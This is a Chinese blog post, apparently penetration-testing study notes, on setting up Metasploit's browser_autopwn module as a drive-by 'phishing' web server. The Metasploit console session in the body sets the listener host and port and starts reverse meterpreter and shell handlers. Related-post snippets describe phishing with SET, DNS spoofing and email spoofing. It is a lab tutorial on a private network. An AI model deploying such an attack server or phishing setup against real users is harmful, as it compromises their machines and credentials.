使用metasploit制作钓鱼网站——browser autopwn攻击

最新推荐文章于 2023-12-24 22:55:58 发布
最新推荐文章于 2023-12-24 22:55:58 发布
阅读量765 收藏 6
点赞数 3
分类专栏: 精通Metasploit学习笔记 文章标签: kali linux metasploit 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19623861/article/details/116703871
版权

文章目录

前言

使用metasploit对客户端渗透测试

一、browser autopwn攻击

msf6 > use auxiliary/server/browser_autopwn
msf6 auxiliary(server/browser_autopwn) > options

Module options (auxiliary/server/browser_autopwn):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST                     yes       The IP address to use for reverse-connect payloads
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to l
                                       isten on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits


msf6 auxiliary(server/browser_autopwn) > set rhosts 192.168.1.115
rhosts => 192.168.1.115
msf6 auxiliary(server/browser_autopwn) > set srvport 80
srvport => 80
msf6 auxiliary(server/browser_autopwn) > set lhost 192.168.1.113
lhost => 192.168.1.113
msf6 auxiliary(server/browser_autopwn) > set uripath /
uripath => /
msf6 auxiliary(server/browser_autopwn) > exploit
[*] Running module against 192.168.1.115
[*] Auxiliary module execution completed

[*] Setup
msf6 auxiliary(server/browser_autopwn) > 
[*] Starting exploit modules on host 192.168.1.113...
.....
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse TCP handler on 192.168.1.113:3333 
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse TCP handler on 192.168.1.113:6666 
[*] Started reverse TCP handler on 192.168.1.113:7777 

[*] --- Done, found 0 exploit modules

[-] No exploits, check your MATCH and EXCLUDE settings
[*] Cleaning up exploits...

启动模块后,任何一个连接到系统80端口的目标都会遭到渗透攻击

二、对网站的客户端进行渗透

metasploit对网站客户进行渗透测试

我重来不说话
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Metasploit 针对WEB的攻击
weiliang369的博客
02-28 199
这个是一个自动化WEB安全检测工具,看官方咋吹的吧: Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. Arachni is smart, it trains itself by learning from the
Metasploit系列----钓鱼测试
bronze_s的博客
04-18 303
测试环境 攻击环境:kali 目标靶机:windows2003(192.168.1.8) 钓鱼测试(使用漏洞ms13_017_teme) 当用户运行对应文件时漏洞被利用 search ms13_017_teme 查询漏洞利用模块 use 路径 进入模块 run 执行漏洞利用代码 会生成一个路径,在目标机器命令行中执行目标机器中将会启动监听程序 使用sessions查看当前会话 使用 sessions -1 2 链接会话 执行一些查看命令发现钓鱼成功,该信息为目标机器的信息 注: 若提示4444端口被
browser_autopwn2
aiquan9342的博客
08-15 177
browser_autopwn2是个啥玩意儿? 一个集合了浏览器漏洞的小框架 option msf > use auxiliary/server/browser_autopwn2 msf auxiliary(browser_autopwn2) > show actions msf auxiliary(browser_autopwn2) ...
Kali渗透测试使用browser_autopwn2模块进行渗透攻击
Liu_Bruce的博客
05-15 1180
Kali渗透测试使用browser_autopwn2模块进行渗透攻击 如果觉得一个一个地选择模块很麻烦, 也可以使用browser_autopwn模块。这种攻击的思路是渗透者构造一个攻击用的Web服务器,然后将这Web服务器的地址发给我目标用户,当目标用户使用有漏洞的浏览器打开这个地址的时候,攻击用的Web服务器就会向浏览器发送各种攻击脚本,如果其中某个攻击脚本攻击成功,就会在目标主机上建立一个Meterpreter会话。 实 验 环 境 攻击机:Linux kali 5.10.0 IP
metasploit对网站漏洞进行攻击
不忘初心,护天下安全!
11-23 2128
针对PHP网站常见的攻击方式中的命令攻击。Command Injection,即命令注入攻击,是指这样一种攻击手段,黑客通过把HTML代码输入一个输入机制(例如缺乏有效验证限制的表格域)来改变网页的动态 生成的内容。使用系统命令是一项危险的操作,尤其在你试图使用远程数据来构造要执行的命令时更是如此。如果使用了被污染数据,命令注入漏洞就产生了。 函数原型 string system(strin...
从零开始学安全(四十五)●browser_autopwn2漏洞利用配合Ettercap工具实施DNS欺骗攻击...
weixin_30631587的博客
04-08 173
系统:kali 2019 工具Ettercap,Metasploit 环境内网地址 首先 cd /etc/ettercap/ 移动在ettercap 文件下 在用vim 打开编辑 etter.dns 进去后 我们将局域网内 所有18段的ip 访问网页都欺骗跳转到本机ip 80端口 在里面添加 接着 编辑文件/var/www/html/index.ht...
基于MetaSploit的网络攻击研究(37页16263字数).doc
06-22
在分析各类攻击分类的基础上, 对MetaSploit攻击平台进行研究,实现如何利用漏洞,如何进行攻击、如何编写攻击代码payload,如何编写shellcode等。 详细介绍参考:...
Metasploit网络攻击样例解析.pptx
01-05
网络渗透攻击与普通网络攻击的不同在于它是一种系统渐进型的综合攻击方式,其攻击目标是明确的,攻击目的往往不那么单一,危害性也非常严重。为了实现渗透攻击攻击者采用的攻击方式绝不仅此于一种简单的Web脚本...
kali-linux 工具Metasploit离线式攻击使用教程
最新发布
12-29
本教程将聚焦于Metasploit的离线攻击使用方法,这对于那些在没有互联网连接或者需要保持匿名状态的环境中工作的安全专家尤其重要。 Metasploit框架是一个开源项目,它提供了大量的攻击模块,涵盖了网络扫描、漏洞...
metasploit 浏览器攻击
01-20
metasploit 浏览器攻击metasploit 浏览器攻击metasploit 浏览器攻击
MetaSploit终端下PostgreSQL数据库的使用.rar
12-29
在IT安全领域,渗透测试是评估系统安全性的重要手段,而MetaSploit是一个广泛使用的开源渗透测试框架。这个压缩包文件“MetaSploit终端下PostgreSQL数据库的使用.rar”显然是关于如何在MetaSploit环境中操作和利用...
Kali学习 | 漏洞利用:4.11 使用browser_autopwn 模块渗透攻击浏览器
qq_43233085的博客
01-13 1595
Kali学习 | 漏洞利用:4.11 使用browser_autopwn 模块渗透攻击浏览器Browser Autopwn介绍操作步骤 Browser Autopwn介绍 Browser Autopwn 是由Metasploit提供的一个辅助模块。 当访问一个Web页面时,它允许用户自动地攻击一个入侵主机。 Browser Autopwn攻击之前,会先进行指纹信息操作,这意味着它不会攻击Mozi...
简单的钓鱼网站制作
热门推荐
Culprit的博客
01-30 2万+
制作环境: Kali 制作步骤: 1.打开软件,选择第一项社会工程攻击 2.选择2 Website Attack Vectors 3.选择3Credential Harvester Attack Method 4.选择2.网站克隆 5.输入你kali的ip地址 6.输入要克隆的网站的url或者ip 7.接下来便是等待上钩 8当别人输
ms10_002(极光漏洞)渗透步骤——MSF搭建钓鱼网站
渗透测试
06-07 2099
本文简单介绍了如何使用metasploit针对ms10_002(极光漏洞)进行渗透测试,仅供学习 测试环境 描述 ip 主机 kali2020 192.168.1.113 目标主机 win xp sp3 192.168.1.106 ①启动msf,搜索ms10_002,使用msf中的exploit攻击模块,设置参数 msf6 > search ms10_002 Matching Modules ================ # Name .
metasploit
weixin_44940180的博客
08-25 321
metasploit是一个渗透测试平台,能够查找、利用和验证漏洞 体系结构 基本模块 Auxiliary 辅助模块 为渗透测试信息收集提供了漏洞的扫描和探测 Exploits 攻击模块 利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,从而 获得对远程目标系统访问权的代码组件 Payload 攻击载荷模块 攻击成功后促使靶机运行的一段植入代码 Post 后渗透攻击模块 攻击拿到shell后收集更
set+MSF进行网站钓鱼
道长道长的博客
09-25 172
SET最常用的攻击方法有:用恶意附件对目标进行 E-mail 钓鱼攻击、Java Applet攻击、基于浏览器的漏洞攻击、收集网站认证信息、建立感染的便携媒体、邮件群发等攻击手段。本文将演示如何借助 SET+MSF 渗透工具对 Win 11 靶机进行网络钓鱼(欺骗用户的账号密码)。
简单的钓鱼网站制作-Setoolkit
5L2g556F5ZWl77yf
03-31 2666
Setoolki这个工具在kali自带,github地址:https://github.com/trustedsec/social-engineer-toolkit git clone https://github.com/trustedsec/social-engineer-toolkit //克隆 pip install -r requirements.txt //依赖 简单的应用 set...
Kali Linux—借助 SET+MSF 进行网络钓鱼、生成木马、获主机shell、权限提升、远程监控、钓鱼邮件等完整渗透测试(三)
weixin_72849553的博客
12-24 1859
Swaks 是一款类似于“瑞士军刀”的工具,之所以这么说是因为它在SMTP邮件协议领域有非常非常广泛的应用,同时对于一名信息安全高级工程师来说也是一个不错的利用工具!它通常被用来伪造邮件,进行钓鱼、社工等操作。Swaks基本用法:1、swaks --to test@qq.com 测试邮箱的连通性;--from test@qq.com //发件人邮箱;--ehlo//伪造邮件ehlo头,即是发件人邮箱的域名。提供身份认证--body "" //引号中的内容即为邮件正文;
Kali Linux使用SET快捷生成钓鱼网站方法
weixin_33873846的博客
02-21 1058
SET (Social Engineering Tools) 1、使用命令:setoolkit会显示工具菜单 2、输入1 ,选择菜单中的Social-EngineeringAttacks (社会工程学攻击) 会显示社会工程攻击的工具 3、输入2,选择Website Attack Vectors网站(钓鱼)攻击向导 会列出所有的网站(钓鱼)攻击的方法供你选择 4、输入3,选择Cred...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我重来不说话

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值